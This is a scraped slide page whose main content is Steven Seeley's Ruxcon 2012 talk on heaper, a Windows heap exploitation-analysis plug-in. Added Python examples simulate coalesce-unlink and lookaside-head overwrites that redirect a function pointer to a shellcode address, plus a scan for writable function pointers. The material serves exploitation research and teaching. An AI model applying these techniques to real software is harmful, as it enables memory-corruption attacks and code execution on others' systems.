Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
How to catch a chameleon - Steven Seeley - Ruxcon 2012
1. How to catch a chameleon
Steven Seeley
steven@immunityinc.com
@net__ninja
Steven Seeley – Ruxcon 2012
2. C:\> whoami /all?
● mr_me
● Security Researcher @ Immunity Inc
● A member of Corelan Security Team
● Ruby/Python developer
● Reverse engineering
● Exploit developer
3. Disclaimer(s)
No zerodays were hurt during the making of this presentation
Sorry, but some Windows heap knowledge is assumed
4. Agenda
● What is 'heaper'?
● Development motivators
● Meta data attack techniques
● Functional design
● Installation
● Using heaper
● Demo analysing a heap overflow
● Limitations
● Future work
● Conclusion
6. Definition of a chameleon?
Chameleon (n)
A small slow-moving Old World lizard with a prehensile tail, long extensible tongue, protruding eyes that rotate independently, and a highly developed ability to change color
9. Similarities
Chameleon                       | Heap manager analysis
Slow moving                     | Slow evolution of security in heap managers*
Protruding, rotating eyes       | Symptoms of long debugging sessions
Ability to change color rapidly | Ability to change its state rapidly
Kills and eats bugs             | Difficulty leads to disclosure, in the hope of other researchers demonstrating exploitation
* Some, such as implementations on mobile platforms, for example WebKit
10. What is heaper?
● A multi-platform win32 heap analysis tool
● A plug-in for Immunity Debugger
● Developed in Python using immlib/heaplib
● An offensive-focused tool:
  ● Visualize the heap layout
  ● Determine exploitable conditions using meta-data
  ● Find application-specific heap primitives
  ● Find application-specific function pointers
  ● Modify heap structures on the fly for simulation
12. Meta data attack techniques
Technique                     | Platform   | Difficulty* | Reliability* | Supported
Coalesce unlink()             | NT 5.[0/1] | 10%         | 100%         | Yes
VirtualAlloc block unlink()   | NT 5.[0/1] | Unknown     | Unknown      | No
Lookaside head overwrite      | NT 5.2     | 50-60%      | Unknown      | Yes
FreeList insert/search/relink | NT 5.2     | Unknown     | Unknown      | Yes
Bitmap flip                   | NT 5.2     | 50-60%      | Unknown      | Yes
Heap cache desynchronisation  | NT 5.2     | 90%         | Unknown      | No
Critical section unlink()     | NT 5.2     | 50%         | 70%          | No
FreeEntryOverwrite            | NT 6.[0/1] | 50%         | 60%          | Yes
Segment Offset                | NT 6.[0/1] | 50%         | 80%          | Yes
Depth De-sync                 | NT 6.[0/1] | 50%         | 70%          | Yes
UserBlocks Overwrite          | NT 6.2     | 90%         | 40%          | No
Application data              | ANY        | Unknown     | Unknown      | Yes
* Difficulty/reliability are estimates based on specific testing and will vary largely depending on context
13. Functional design
● Object oriented design
● Easily extendable
● Chunk validation based on allocator ordering & categorization
● General heuristics check per allocator
15. Functional design
Chunk validation:
● Let's say we have chunk 0x0026fee8 in FreeList[0].
● We know the relative offsets:
  ● 0x0026fee8+0x0 is the size
  ● 0x0026fee8+0x2 is the previous chunk's size
  ● 0x0026fee8+0x4 is the cookie
  ● 0x0026fee8+0x8 is the Flink/Blink
Therefore we can validate the chunk based on its position and by reading memory.
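As an added example (not heaper's own code, which runs inside Immunity Debugger on top of immlib/heaplib), the following stand-alone Python applies the checks the slide describes to a constructed NT 5.x heap image: it lays down a FreeList[0] holding two free chunks, validates them from the header offsets listed above, then simulates an overflow from the preceding in-use chunk that plants Flink/Blink for the coalesce unlink() technique from the table on slide 12, and reports what the validator sees and which two stores the unlink would perform. The heap base, the list-head offset, the function-pointer and shellcode addresses and the cookie function are assumptions made for the illustration, not Windows' real values.

```python
import struct

# Added example, not heaper's code. Header layout from the slide above (NT 5.x, 8-byte
# granularity): +0 Size, +2 PreviousSize (both in 8-byte units), +4 cookie, +5 Flags,
# +8 Flink, +0xc Blink (Flink/Blink sit in the user data of a free chunk).
GRANULARITY = 8
HEAP_ENTRY_BUSY = 0x01
HEAP_BASE, HEAP_SIZE = 0x00260000, 0x1000   # assumed: a small slice of the process heap
FREELIST0 = HEAP_BASE + 0x178               # assumed: stands in for &_HEAP.FreeList[0]
FPTR = 0x00403000                            # assumed: writable function pointer the attacker targets
SHELLCODE = 0x0C0C0C0C                       # assumed: attacker-controlled address (e.g. a spray)

heap = bytearray(HEAP_SIZE)                  # flat image standing in for the debugger's memory reads


def in_heap(addr, length=4):
    return HEAP_BASE <= addr and addr + length <= HEAP_BASE + HEAP_SIZE

def u8(addr):  return heap[addr - HEAP_BASE]
def u16(addr): return struct.unpack_from("<H", heap, addr - HEAP_BASE)[0]
def u32(addr): return struct.unpack_from("<I", heap, addr - HEAP_BASE)[0]
def write(addr, data): heap[addr - HEAP_BASE:addr - HEAP_BASE + len(data)] = data

def cookie_for(addr):
    """Stand-in for the per-chunk header cookie (assumption, not the real XP algorithm)."""
    return (addr >> 3) & 0xFF

def write_chunk(addr, size_units, prev_units, busy, flink=0, blink=0):
    flags = HEAP_ENTRY_BUSY if busy else 0
    write(addr, struct.pack("<HHBBBB", size_units, prev_units, cookie_for(addr), flags, 0, 0))
    if not busy:
        write(addr + 8, struct.pack("<II", flink, blink))

def parse_chunk(addr):
    return {"addr": addr, "size": u16(addr), "prev_size": u16(addr + 2), "cookie": u8(addr + 4),
            "flags": u8(addr + 5), "flink": u32(addr + 8), "blink": u32(addr + 12)}

def validate_free_chunk(addr):
    """Findings for a chunk that is supposed to sit on a free list; [] means consistent."""
    c, entry, findings = parse_chunk(addr), addr + 8, []
    if c["cookie"] != cookie_for(addr):
        findings.append("cookie mismatch: header overwritten?")
    if c["flags"] & HEAP_ENTRY_BUSY:
        findings.append("busy flag set on a chunk in a free list")
    nxt = addr + c["size"] * GRANULARITY
    if c["size"] == 0 or not in_heap(nxt, 8):
        findings.append("Size 0x%x does not land on a chunk inside the heap" % c["size"])
    elif u16(nxt + 2) != c["size"]:
        findings.append("next chunk PreviousSize 0x%x != Size 0x%x" % (u16(nxt + 2), c["size"]))
    # Flink/Blink must point into the heap and the neighbours must point back at this entry;
    # Windows 2000 and XP before SP2 never checked this, which is what coalesce unlink() abuses.
    if not in_heap(c["flink"], 8):
        findings.append("Flink 0x%08x points outside the heap" % c["flink"])
    elif u32(c["flink"] + 4) != entry:
        findings.append("Flink->Blink does not point back at this chunk")
    if not in_heap(c["blink"], 8):
        findings.append("Blink 0x%08x points outside the heap" % c["blink"])
    elif u32(c["blink"]) != entry:
        findings.append("Blink->Flink does not point back at this chunk")
    return findings

def unlink_writes(c):
    """The two stores RemoveEntryList performs on unlink: [Blink] = Flink and [Flink+4] = Blink."""
    return [(c["blink"], c["flink"]), (c["flink"] + 4, c["blink"])]

def build_heap():
    """Constructed layout: A (in use) | B (free) | C (free) | W (in use); B and C on FreeList[0]."""
    heap[:] = bytes(HEAP_SIZE)
    a, b, c, w = HEAP_BASE + 0x400, HEAP_BASE + 0x480, HEAP_BASE + 0x600, HEAP_BASE + 0x700
    write_chunk(a, 0x10, 0x08, busy=True)
    write_chunk(b, 0x30, 0x10, busy=False, flink=c + 8, blink=FREELIST0)
    write_chunk(c, 0x20, 0x30, busy=False, flink=FREELIST0, blink=b + 8)
    write_chunk(w, 0x10, 0x20, busy=True)
    write(FREELIST0, struct.pack("<II", b + 8, c + 8))   # list head: Flink = B, Blink = C
    return a, b, c

def overflow_into_b(a):
    """memcpy() overrun from A's user buffer: keeps B's sizes sane so coalescing proceeds,
    clobbers the cookie byte and plants Flink/Blink for a write-4 on unlink."""
    payload = b"A" * 0x78                                          # A's 0x80 - 8 bytes of user data
    payload += struct.pack("<HHBBBB", 0x30, 0x10, 0x41, 0, 0, 0)   # B's header, cookie now 0x41
    payload += struct.pack("<II", SHELLCODE, FPTR)                 # B's Flink, Blink
    write(a + 8, payload)

if __name__ == "__main__":
    a, b, c = build_heap()
    print("clean:", validate_free_chunk(b), validate_free_chunk(c))
    overflow_into_b(a)
    for f in validate_free_chunk(b):
        print("B:", f)
    for where, what in unlink_writes(parse_chunk(b)):
        print("unlink would write 0x%08x to 0x%08x" % (what, where))
```

Note that the corruption of B also surfaces when C is validated, because C's Blink no longer points back at it; this is the kind of cross-chunk symptom heaper's ordering-based validation relies on, and the reason a single overwritten chunk can trip several findings (slide 79's false-positive caveat applies in the other direction: a sane-looking Flink/Blink pair does not prove the chunk is untouched).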
16. Functional design
Chunk validation on ListHint[{0x7f,0x7ff}]
-> Windows 7 LFH (size is encoded)
-> Checks ListHint[0x7f] and ListHint[0x7ff]
31. Functional design
Easy to use:
● Generates a specific menu based on the Windows version in use – no option to analyse the LFH if it doesn't exist
● Generates graphs for each bin size separately; for exploitation we generally target a specific bin size
● n × 4-byte write simulation on function pointers, with the ability to restore the said function pointers
● The ability to modify a single BIT in the FreeListInUse struct
● 'update' command for easily updating heaper
● 'config' command to configure the output directory of logs and graphs
● Everything is logged in a new "heaper" window
32. Installation
● Prerequisites:
  ● Immunity Debugger v1.85 and above
  ● Graphviz v2.28.0 and above - http://www.graphviz.org/
  ● Pyparsing - http://sourceforge.net/projects/pyparsing/
  ● PyDot - http://code.google.com/p/pydot/
1. Install Immunity Debugger :->
2. Add 'C:\Python27' to your PATH environment variable
3. Run the Graphviz MSI packaged installer
4. Navigate into your pydot and pyparsing directories and execute 'python setup.py install'
5. Copy heaper to the 'C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands' directory
41. Dumping function pointers
● Finds function pointers whether or not they are writable
● Deprecated and will be removed in the next major release
43. Finding writable pointers
● Similar to the dump function pointers routine, but executes the action across the whole module
● This can be executed against all modules
● As the name states, only writable function pointers, to facilitate a write-4 condition
● Don't be fooled, it doesn't just dump the IAT
● It can find OS-specific function pointers, making your exploit work independently of any application-specific function pointers
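The scan behind slides 41 and 43, as an added example that is not heaper's code: walk every 4-byte aligned dword in a module's sections and keep those that land inside an executable section of any loaded module, restricted to writable sections when looking for write-4 targets. The section tables and bytes are constructed here; on a live target they would come from the PE headers and from the debugger's memory reads. The module names, addresses and contents are assumptions made for the illustration.

```python
import struct
from collections import namedtuple

# Added example, not heaper's code. Module layouts below are constructed for the illustration.
IMAGE_SCN_MEM_EXECUTE = 0x20000000   # PE section characteristics bits
IMAGE_SCN_MEM_WRITE = 0x80000000

Section = namedtuple("Section", "name va size flags data")
Module = namedtuple("Module", "name sections")

def code_ranges(modules):
    """Every executable section of every loaded module, as (module!section, lo, hi)."""
    return [("%s!%s" % (m.name, s.name), s.va, s.va + s.size)
            for m in modules for s in m.sections if s.flags & IMAGE_SCN_MEM_EXECUTE]

def find_function_pointers(module, modules, writable_only=True):
    """Dwords in `module`'s sections that point into code of any module.
    writable_only=True is the 'find writable pointers' routine (write-4 targets);
    False is the older 'dump function pointers' behaviour that ignores page protection."""
    ranges, hits = code_ranges(modules), []
    for s in module.sections:
        if writable_only and not s.flags & IMAGE_SCN_MEM_WRITE:
            continue
        for off in range(0, len(s.data) - 3, 4):
            val = struct.unpack_from("<I", s.data, off)[0]
            for target, lo, hi in ranges:
                if lo <= val < hi:
                    hits.append((s.va + off, val, target))
                    break
    return hits

def os_pointers(hits, module):
    """Hits whose target lies in another module: usable regardless of the app's own code layout."""
    return [h for h in hits if not h[2].startswith(module.name + "!")]

def sample_modules():
    """Constructed: app.exe with a callback pointer in .data, import thunks in a writable .idata,
    and pointers in read-only .rdata that must not be reported as write-4 targets."""
    p = lambda *vals: b"".join(struct.pack("<I", v) for v in vals)
    app = Module("app.exe", [
        Section(".text", 0x00401000, 0x1000, IMAGE_SCN_MEM_EXECUTE, b""),
        Section(".rdata", 0x00402000, 0x10, 0,
                p(0x00401500, 0x00000000, 0x0C0C0C0C, 0x00401000)),
        Section(".data", 0x00403000, 0x10, IMAGE_SCN_MEM_WRITE,
                p(0x00000001, 0x00403004, 0x00401230, 0xFFFFFFFF)),
        Section(".idata", 0x00404000, 0x0C, IMAGE_SCN_MEM_WRITE,
                p(0x7C80B000, 0x7C9101F0, 0x00000000)),
    ])
    kernel32 = Module("kernel32.dll", [Section(".text", 0x7C801000, 0x80000, IMAGE_SCN_MEM_EXECUTE, b"")])
    ntdll = Module("ntdll.dll", [Section(".text", 0x7C901000, 0x70000, IMAGE_SCN_MEM_EXECUTE, b"")])
    return app, [app, kernel32, ntdll]

if __name__ == "__main__":
    app, mods = sample_modules()
    for addr, val, target in find_function_pointers(app, mods):
        print("0x%08x -> 0x%08x (%s)" % (addr, val, target))
```

The two IAT thunks are reported alongside the application's own callback in .data, which is the point of "it doesn't just dump the IAT": the .data hit is only useful if the application will call through it, whereas the thunks into kernel32/ntdll are hit by any code path that imports those functions.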
46. Analyzing the allocator state NT 5.x
Lookaside - chunk analysis
● Easy to understand layout
● Displays the cookie, chunk size and flink
● Notification of an overwrite using the first byte in the chunk header (size)
● If userdata == flink, possible exploitation
48. Analyzing the allocator state NT 5.x
Lookaside with verbose mode (-v)
● Displays the _general_lookaside_list struct
● Displays the _slist_header struct
● Instantly determine if a list itself has been overwritten
● Much like 'dt _general_lookaside_list <addr>' in WinDbg
50. Analyzing the allocator state NT 5.x
Lookaside - vuln analysis
● Set (function pointer - 0x8) as the new lookaside chunk address: the user pointer handed out for that chunk is its address + 0x8, i.e. the function pointer itself
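The lookaside head overwrite that slides 46 to 50 analyse, as an added example (not heaper's code): a model of the NT 5.x lookaside fast path over a flat memory image, an overflow from an in-use chunk into the Flink of the free chunk behind it, a heaper-style walk of the list that flags the overwritten size byte and the out-of-heap Flink, and the two allocations that turn the planted value into a pointer to the function pointer. The memory range, heap bounds, bin size and all addresses are assumptions made for the illustration.

```python
import struct

# Added example, not heaper's code: a model of the NT 5.x lookaside fast path and the
# lookaside head overwrite. All addresses below are assumptions.
MEM_BASE, MEM_SIZE = 0x00350000, 0x00060000   # flat model of the address range we touch
HEAP_BASE, HEAP_END = 0x00350000, 0x00351000  # the heap segment inside that range
BIN_UNITS = 8                                  # bin of 0x40-byte chunks (8-byte granules)
FPTR = 0x003A0000                              # assumed: writable function pointer in app data
ORIG_HANDLER = 0x00371230                      # assumed: what FPTR points at before the attack
SHELLCODE = 0x0C0C0C0C                         # assumed: attacker-chosen value

mem = bytearray(MEM_SIZE)

def u16(addr): return struct.unpack_from("<H", mem, addr - MEM_BASE)[0]
def u32(addr): return struct.unpack_from("<I", mem, addr - MEM_BASE)[0]
def p32(addr, val): struct.pack_into("<I", mem, addr - MEM_BASE, val)
def write(addr, data): mem[addr - MEM_BASE:addr - MEM_BASE + len(data)] = data

def cookie_for(addr):
    return (addr >> 3) & 0xFF   # stand-in cookie byte (assumption, not the real algorithm)

def make_chunk(addr):
    """8-byte header: Size, PreviousSize (granules), cookie, Flags=busy, UnusedBytes, SegmentIndex."""
    write(addr, struct.pack("<HHBBBB", BIN_UNITS, BIN_UNITS, cookie_for(addr), 0x01, 0, 0))

class Lookaside:
    """LIFO of free chunk headers for one bin. A free chunk's Flink is the first dword of its
    user data (header + 8). Pop reads it back without any validation, as NT 5.x does."""
    def __init__(self):
        self.head = 0

    def free(self, user_ptr):                  # RtlFreeHeap fast path
        chunk = user_ptr - 8
        p32(chunk + 8, self.head)
        self.head = chunk

    def alloc(self):                           # RtlAllocateHeap fast path
        chunk = self.head
        if chunk == 0:
            return None
        self.head = u32(chunk + 8)             # whatever sits in the user data becomes the new head
        return chunk + 8

def analyse(ls, limit=16):
    """heaper-style walk: list the chunks on the lookaside and flag overwrite symptoms."""
    findings, cur = [], ls.head
    for _ in range(limit):
        if cur == 0:
            break
        if not HEAP_BASE <= cur < HEAP_END:
            findings.append((cur, "chunk address outside the heap"))
            break
        size, flink = u16(cur), u32(cur + 8)
        if size != BIN_UNITS:
            findings.append((cur, "Size 0x%x != bin size 0x%x: header overwritten" % (size, BIN_UNITS)))
        if flink and not HEAP_BASE <= flink < HEAP_END:
            findings.append((cur, "Flink 0x%08x outside the heap: a later alloc returns 0x%08x"
                             % (flink, flink + 8)))
        cur = flink
    return findings

def run_attack():
    """Returns (findings before overflow, findings after, 1st alloc, 2nd alloc, value at FPTR)."""
    mem[:] = bytes(MEM_SIZE)
    p32(FPTR, ORIG_HANDLER)
    a, b, c = HEAP_BASE + 0x100, HEAP_BASE + 0x140, HEAP_BASE + 0x180
    for ch in (a, b, c):
        make_chunk(ch)
    ls = Lookaside()
    ls.free(c + 8)
    ls.free(b + 8)                             # list: B -> C -> 0; A stays in use
    clean = analyse(ls)
    # Vulnerable memcpy(): 0x38 bytes fit in A, the rest lands on B's header and Flink
    payload = b"A" * (BIN_UNITS * 8 - 8) + b"A" * 8 + struct.pack("<I", FPTR - 8)
    write(a + 8, payload)
    dirty = analyse(ls)
    first = ls.alloc()                         # B+8; the head is now FPTR-8
    second = ls.alloc()                        # (FPTR-8)+8 == FPTR handed out as a fresh buffer
    write(second, struct.pack("<I", SHELLCODE))  # the app's next copy overwrites the pointer
    return clean, dirty, first, second, u32(FPTR)

if __name__ == "__main__":
    clean, dirty, first, second, now = run_attack()
    for addr, why in dirty:
        print("0x%08x: %s" % (addr, why))
    print("2nd alloc -> 0x%08x, FPTR now 0x%08x" % (second, now))
```

The second pop also reads the function pointer's current value as the next list head, which is why a real exploit needs the allocation pattern (two allocations of the bin size, then a copy into the second) to happen before anything else touches that lookaside.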
73. Hooking the heap manager
Hard hooking
● HeapAlloc/HeapFree
● Can be extended for other heap functions
● Discover primitives
74. Hooking the heap manager
Soft hooking
Use only for testing; not designed to be used with large applications
75. Patching
Patching - PEB
● A binary may be compiled in debug mode
● What if we are trying to execute a function pointer that assumes the process is not being debugged?
76. Updating
Update to the latest version with ease
The update function just generates a git hash and compares digests. There is no version tracking yet.
79. Detecting exploitable conditions
● Detecting exploitable conditions can be very difficult and prone to many false positives.
● If you overwrite a specific chunk, then just due to the amount of data you overwrote with, it may or may not be deemed exploitable.
● Therefore understanding the limitations of each of the conditions is required for accurate analysis.
82. Detecting exploitable conditions
FreeList/ListHint – No technique suggestion*
● No techniques for exploitation against the FreeList/ListHint under Windows NT 6.x have been disclosed publicly so far.
88. Limitations
● Does not analyze the LFH on XP
● Does not analyze the LFH on Windows 8
● Supports only a limited number of meta-data attacks for now
● Does not log analysis findings external to the debugger
● Needs a decent heap search function
● Needs to support other heap implementations
89. Future work
● Support LFH analysis on Windows 8
● Support other heap manager implementations (jemalloc)
● Support more meta-data attacks
● Perform log analysis
● Detect 'interesting' application data on the heap
● Add a decent search function
● Improve the heuristics engine
90. Conclusion
● Run-time analysis of the heap to detect meta-data attack conditions is complex
● Some form of solver may be more applicable to this type of analysis :->
● Whilst heaper is not Turing complete, it will solve many corner cases.
● Immunity will continue to be a leader in the development and application of heap exploitation techniques
92. Code design/improvements/patches/ideas are very welcome :>
steventhomasseeley@gmail.com
For more information please execute:
$ git clone https://github.com/mrmee/heaper.git
$ wget -r http://net-ninja.net/